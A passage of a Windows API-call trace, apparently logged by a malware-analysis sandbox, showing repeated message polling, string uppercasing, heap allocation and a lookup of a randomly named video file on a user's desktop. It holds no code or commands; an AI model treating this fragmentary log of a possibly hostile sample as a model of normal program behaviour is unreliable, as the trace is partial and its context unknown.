wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] lstrlenW (lpString="20") returned 2 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] lstrlenW (lpString="31") returned 2 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] lstrlenW (lpString="20") returned 2 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] lstrlenW (lpString="20") returned 2 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.067] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.081] lstrlenW (lpString="32") returned 2 [0084.081] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.081] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.081] lstrlenW (lpString="20") returned 2 [0084.081] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.081] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.081] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.118] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.118] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.118] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.118] lstrlenW (lpString="20") returned 2 [0084.118] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.118] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] lstrlenW (lpString="35") returned 2 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] lstrlenW (lpString="20") returned 2 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] lstrlenW (lpString="20") returned 2 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] lstrlenW (lpString="31") returned 2 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] lstrlenW (lpString="20") returned 2 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] lstrlenW (lpString="20") returned 2 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.119] lstrlenW (lpString="32") returned 2 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] lstrlenW (lpString="20") returned 2 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] lstrlenW (lpString="20") returned 2 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] lstrlenW (lpString="31") returned 2 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] lstrlenW (lpString="20") returned 2 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] lstrlenW (lpString="20") returned 2 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.120] lstrlenW (lpString="31") returned 2 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] lstrlenW (lpString="20") returned 2 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] lstrlenW (lpString="20") returned 2 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] lstrlenW (lpString="30") returned 2 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] lstrlenW (lpString="20") returned 2 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.123] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-yB2WD9ZHipl10.mkv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0xfa00000, dwReserved1=0x15ee320, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 0x98f7c8 [0084.200] FindClose (in: hFindFile=0x98f7c8 | out: hFindFile=0x98f7c8) returned 1 [0084.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.201] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0084.201] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0084.201] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.201] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0084.201] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0084.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6dff0 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72788 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e798 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec280 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72658 [0084.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec280 | out: hHeap=0x2af0000) returned 1 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e810 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec280 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec358 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72668 [0084.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e838 [0084.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72678 [0084.201] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e838 | out: hHeap=0x2af0000) returned 1 [0084.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72678 | out: hHeap=0x2af0000) returned 1 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0d0 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72798 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec130 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72678 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72688 [0084.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72688 | out: hHeap=0x2af0000) returned 1 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0084.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72678 | out: hHeap=0x2af0000) returned 1 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ec4c0 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e838 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec598 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72678 [0084.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec598 | out: hHeap=0x2af0000) returned 1 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e860 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec550 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.202] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec520 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72688 [0084.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec520 | out: hHeap=0x2af0000) returned 1 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e888 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec520 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec478 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72758 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e8d8 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec598 [0084.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72768 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec598 | out: hHeap=0x2af0000) returned 1 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6eb08 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec658 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e888 | out: hHeap=0x2af0000) returned 1 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72688 | out: hHeap=0x2af0000) returned 1 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec520 | out: hHeap=0x2af0000) returned 1 [0084.203] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e888 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec520 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72688 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6a0 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726b8 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec598 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7a8 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7a8 | out: hHeap=0x2af0000) returned 1 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec988 | out: hHeap=0x2af0000) returned 1 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec598 | out: hHeap=0x2af0000) returned 1 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726b8 | out: hHeap=0x2af0000) returned 1 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726b8 [0084.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726b8 | out: hHeap=0x2af0000) returned 1 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0084.203] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726b8 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec598 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7a8 [0084.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec910 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726d8 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec808 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7c0 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72908 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7d8 [0084.204] 